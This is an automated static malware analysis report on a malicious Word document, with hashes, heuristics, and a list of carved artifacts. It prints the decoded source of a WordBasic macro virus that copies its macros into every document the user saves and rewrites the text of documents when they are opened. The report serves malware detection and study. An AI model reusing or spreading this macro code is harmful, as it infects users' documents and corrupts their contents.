Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 d422455ff1395204…

MALICIOUS

Office (OOXML)

2.10 MB Created: 2014-10-29 10:08:00 UTC Authoring application: Microsoft Office Word 15.0000 First seen: 2021-05-23
MD5: b94568aaee6b658da9a8092adafe4ebb SHA-1: 95b6093b2eb56233e5a742c1b2b4803bc0881bcc SHA-256: d422455ff1395204a725e94cd75b2893f9e68d10ef7664aac5b8474ea54450f6
242 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1203 Exploitation for Client Execution

The presence of a high-severity heuristic for an AutoOpen macro and the critical ClamAV detection strongly indicate malicious intent. The VBA macro code, though partially truncated, suggests an attempt to infect the document or execute further malicious actions, likely involving the embedded Equation Editor OLE object. The macro's structure implies it's designed to run automatically upon opening the document, potentially leading to the download and execution of a second-stage payload.

Heuristics 6

  • Equation Editor OLE object high CVE related OLE_EQUATION_EDITOR
    Embedded OLE object word/embeddings/oleObject71.bin contains the Equation Editor CLSID, the legacy component exploited by CVE-2017-11882, CVE-2018-0802, and CVE-2018-0798.
  • ClamAV: Doc.Trojan.Nop-5 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Nop-5
  • VBA project inside OOXML medium 1 related finding OOXML_VBA
    Document contains a VBA project — VBA macros present
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Embedded OLE object medium OOXML_OLE_OBJECT
    Document contains an embedded OLE object
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 32

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 5019 bytes
SHA-256: e040cf9088a23635f015629aaaca8261e4c26807e28632de04cdafbbecaaf83b
Detection
ClamAV: Doc.Trojan.Nop-5
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "HelpAbout"

Rem ===============================================================
Rem Some Joke from this Macro.
Rem ===============================================================



Public Sub MAIN()
Attribute MAIN.VB_Description = "Отображает информацию о программе и номер версии"
Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.HelpAbout.MAIN"

On Error GoTo -1: On Error GoTo Halt

WordBasic.HelpAbout APPNAME:="Sucks!"

Halt:
Err.Number = 0
End Sub

Attribute VB_Name = "FileClose"

Rem ==============================================================
Rem Invecting module of this Macro.
Rem ==============================================================



Public Sub MAIN()
Attribute MAIN.VB_Description = "Закрывает все окна активного документа"
Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.FileClose.MAIN"
Dim W
Dim N$
Dim S$

On Error GoTo -1: On Error GoTo Halt

W = WordBasic.IsDocumentDirty()
Dim Dlg As Object: Set Dlg = WordBasic.DialogRecord.FileSaveAs(False)
WordBasic.CurValues.FileSaveAs Dlg
If Dlg.Format <= 1 Then
    If Dlg.Format = 0 Then
        Dlg.Format = 1
        WordBasic.FileSaveAs Dlg
    End If
    N$ = "Normal.Dot:"
    S$ = Dlg.Name + ":"
    WordBasic.MacroCopy N$ + "FileClose", S$ + "FileClose", 1
    WordBasic.MacroCopy N$ + "DocClose", S$ + "DocClose", 1
    WordBasic.MacroCopy N$ + "FileOpen", S$ + "FileOpen", 1
    WordBasic.MacroCopy N$ + "HelpAbout", S$ + "HelpAbout", 1
    WordBasic.MacroCopy N$ + "Internal", S$ + "AutoOpen", 1
    WordBasic.SetDocumentDirty W
End If


Halt:
Err.Number = 0
WordBasic.FileClose

End Sub

Attribute VB_Name = "FileOpen"

Rem ==================================================================
Rem Destructive operations from this Macro.
Rem ==================================================================



Public Sub MAIN()
Attribute MAIN.VB_Description = "Открывает существующий документ или шаблон"
Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.FileOpen.MAIN"

On Error GoTo -1: On Error GoTo Halt

Dim Dlg As Object: Set Dlg = WordBasic.DialogRecord.FileOpen(False)
WordBasic.CurValues.FileOpen Dlg
WordBasic.Dialog.FileOpen Dlg
WordBasic.FileOpen Dlg

WordBasic.EditReplace Find:="Windows", Replace:="Sucks must die!", ReplaceAll:=1

Halt:
Err.Number = 0
End Sub

Attribute VB_Name = "DocClose"

Rem ==============================================================
Rem Invecting module of this Macro.
Rem ==============================================================



Public Sub MAIN()
Attribute MAIN.VB_Description = "Предлагает сохранить активный документ и закрывает активное окно"
Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.DocClose.MAIN"
Dim W
Dim N$
Dim S$

On Error GoTo -1: On Error GoTo Halt

W = WordBasic.IsDocumentDirty()
Dim Dlg As Object: Set Dlg = WordBasic.DialogRecord.FileSaveAs(False)
WordBasic.CurValues.FileSaveAs Dlg
If Dlg.Format <= 1 Then
    If Dlg.Format = 0 Then
        Dlg.Format = 1
        WordBasic.FileSaveAs Dlg
    End If
    N$ = "Normal.Dot:"
    S$ = Dlg.Name + ":"
    WordBasic.MacroCopy N$ + "FileClose", S$ + "FileClose", 1
    WordBasic.MacroCopy N$ + "DocClose", S$ + "DocClose", 1
    WordBasic.MacroCopy N$ + "FileOpen", S$ + "FileOpen", 1
    WordBasic.MacroCopy N$ + "HelpAbout", S$ + "HelpAbout", 1
    WordBasic.MacroCopy N$ + "Internal", S$ + "AutoOpen", 1
    WordBasic.SetDocumentDirty W
End If


Halt:
Err.Number = 0
WordBasic.DocClose

End Sub

Attribute VB_Name = "AutoOpen"

Rem =================================================================
Rem StartUp Initialization.
Rem =====================================================
... (truncated)
ooxml_oleobject_00.bin ooxml-ole-object OOXML embedded OLE part: word/embeddings/oleObject155.bin 3072 bytes
SHA-256: c9241e87674c2c7ed263c65f4ffa6fe6d87e836758d36118ac7dd787c69514ac
ooxml_oleobject_01.bin ooxml-ole-object OOXML embedded OLE part: word/embeddings/oleObject71.bin 3584 bytes
SHA-256: e405ecf051739ef5a789431c65877568c981da0084cfc0aa5c355c143979fb57
ooxml_oleobject_02.bin ooxml-ole-object OOXML embedded OLE part: word/embeddings/oleObject126.bin 3584 bytes
SHA-256: 3346fa49f43a2589df6fdc88b62311f763cb242fb0a76f118fa4546e5f9e83a4
ooxml_oleobject_03.bin ooxml-ole-object OOXML embedded OLE part: word/embeddings/oleObject188.bin 3584 bytes
SHA-256: deb903ed55cae59c3d579c14435ce995e9d91e5d24dd88d2664287b98f08f998
ooxml_oleobject_04.bin ooxml-ole-object OOXML embedded OLE part: word/embeddings/oleObject87.bin 3072 bytes
SHA-256: 8b830d55ec202ac40f83707f1e2674824e2fcafda722b8216aa7a1527c28458b
ooxml_oleobject_05.bin ooxml-ole-object OOXML embedded OLE part: word/embeddings/oleObject116.bin 3072 bytes
SHA-256: 19a2b17e50e23a485ff28b97f1bd6b2d54dca33146df416341282208ec0ac475
ooxml_oleobject_06.bin ooxml-ole-object OOXML embedded OLE part: word/embeddings/oleObject38.bin 3072 bytes
SHA-256: 8e9b4da15943c15aac2dfc8cb4fe7be89435d90b2849c4aed52bc3aa19d9e18f
ooxml_oleobject_07.bin ooxml-ole-object OOXML embedded OLE part: word/embeddings/oleObject113.bin 3072 bytes
SHA-256: 7c35d1ffc9c9b4a7730efd42824ba11834606603a2401ff569952d18ab0f50a0
ooxml_oleobject_08.bin ooxml-ole-object OOXML embedded OLE part: word/embeddings/oleObject54.bin 3584 bytes
SHA-256: cb9569f0fa91764702e76c832716e91e9bff742f06f8a80c282784d48f9d38a1
ooxml_oleobject_09.bin ooxml-ole-object OOXML embedded OLE part: word/embeddings/oleObject139.bin 3072 bytes
SHA-256: 7653ad6b8fa55c708c5c5a8224d3291e743e4608ef0b43e27c1cda6ebded849e
ooxml_oleobject_10.bin ooxml-ole-object OOXML embedded OLE part: word/embeddings/oleObject149.bin 3072 bytes
SHA-256: 2ba5967452f69c4c10d3dab80dceac345c038d07936cdf9de246df7a224ce92e
ooxml_oleobject_11.bin ooxml-ole-object OOXML embedded OLE part: word/embeddings/oleObject45.bin 3072 bytes
SHA-256: bcf88047cd6ecfc550c6b0570b5bb643358674d6f6ababf23f2e066ab92ff306
ooxml_oleobject_12.bin ooxml-ole-object OOXML embedded OLE part: word/embeddings/oleObject182.bin 3072 bytes
SHA-256: 2cc9adba7cabf4058ddc4fdf3f7c6fbd5bec9d3f456d9c7dcaf0d33d51717a98
ooxml_oleobject_13.bin ooxml-ole-object OOXML embedded OLE part: word/embeddings/oleObject67.bin 3072 bytes
SHA-256: 9f29e6ecdddde43caf382f75a4e589659900cbcef53821518a9b8f7cfbf361f9
ooxml_oleobject_14.bin ooxml-ole-object OOXML embedded OLE part: word/embeddings/oleObject29.bin 3072 bytes
SHA-256: 3c24de16a44cba7269a68cdaebe2ad5b8de6844f29424ec4485f2ce149d4d853
ooxml_oleobject_15.bin ooxml-ole-object OOXML embedded OLE part: word/embeddings/oleObject32.bin 3072 bytes
SHA-256: 78341d8f443c694997276818905f010119b82da50031aa1a8b33f392f8ec88ab
ooxml_oleobject_16.bin ooxml-ole-object OOXML embedded OLE part: word/embeddings/oleObject160.bin 3072 bytes
SHA-256: 71fe05e68cc6e9e9c4413be4dbf1d4f547ffcf0d80dcac9366e0e5f737bc14d7
ooxml_oleobject_17.bin ooxml-ole-object OOXML embedded OLE part: word/embeddings/oleObject119.bin 3584 bytes
SHA-256: 5d973ed03049ce514df618a5c48523e5b96b90997a8666568657769ab51e838c
ooxml_oleobject_18.bin ooxml-ole-object OOXML embedded OLE part: word/embeddings/oleObject101.bin 3584 bytes
SHA-256: d1e4b3f2ed16b191238c9a19a3b7e8440e36354be3d558aec55831a6decc2641
ooxml_oleobject_19.bin ooxml-ole-object OOXML embedded OLE part: word/embeddings/oleObject84.bin 3584 bytes
SHA-256: 1d9c73a995cdb767a306967bc1ab197682d64c7f2952757b9bce927b2192d0a1
ooxml_oleobject_20.bin ooxml-ole-object OOXML embedded OLE part: word/embeddings/oleObject43.bin 3584 bytes
SHA-256: ea5925d79ede428a9eee143608991a530d6efb10240e71ab911d708e7c78091f
ooxml_oleobject_21.bin ooxml-ole-object OOXML embedded OLE part: word/embeddings/oleObject3.bin 3072 bytes
SHA-256: e85558e7951c79bed5fc5dc8ea6016c88c8b842fc215c3550eec687e9762513e
ooxml_oleobject_22.bin ooxml-ole-object OOXML embedded OLE part: word/embeddings/oleObject153.bin 3072 bytes
SHA-256: 546e8eb76c798b0bbca09014cf85cfd882aeef8c3672defcc6799e10c16a13f3
ooxml_oleobject_23.bin ooxml-ole-object OOXML embedded OLE part: word/embeddings/oleObject158.bin 3584 bytes
SHA-256: d82f522b41213835b4edf3d49ab0ab1535a0b1f8603c3cc1d6abe120594ac309
ooxml_oleobject_24.bin ooxml-ole-object OOXML embedded OLE part: word/embeddings/oleObject141.bin 3584 bytes
SHA-256: f4034febfcd159c1a9e4e40676fa479dbb5b08348d6f4a2b4df0bb80e540a1e8
ooxml_oleobject_25.bin ooxml-ole-object OOXML embedded OLE part: word/embeddings/oleObject176.bin 3072 bytes
SHA-256: b8aa8526a55d27b1a05b360c5240ddada00f1b2838debea7105776c2dbf71bf0
ooxml_oleobject_26.bin ooxml-ole-object OOXML embedded OLE part: word/embeddings/oleObject42.bin 3072 bytes
SHA-256: 0f849b23d2b11d7d2da3b37748b251b438d81adafd570e6a670865a621221668
ooxml_oleobject_27.bin ooxml-ole-object OOXML embedded OLE part: word/embeddings/oleObject49.bin 3584 bytes
SHA-256: 3fa4dc1bfcdec1c9d9f230e8d4c2aa0e66ce9a42ded3c732c16b00cf0f05c8f0
ooxml_oleobject_28.bin ooxml-ole-object OOXML embedded OLE part: word/embeddings/oleObject50.bin 3072 bytes
SHA-256: a731285d31e3aa0753f25de9959c2774dad663167f62b510c2e4c0b47347beef
ooxml_oleobject_29.bin ooxml-ole-object OOXML embedded OLE part: word/embeddings/oleObject14.bin 3072 bytes
SHA-256: 04994e4705eefb7361e5f3afb6cf42d4bf10e69d79279b701fc093267893a762
ooxml_oleobject_30.bin ooxml-ole-object OOXML embedded OLE part: word/embeddings/oleObject166.bin 3072 bytes
SHA-256: 41d9824d91bfbce76418cb776dab797d46d37df57856e08c9c4fe47f8dd9ae41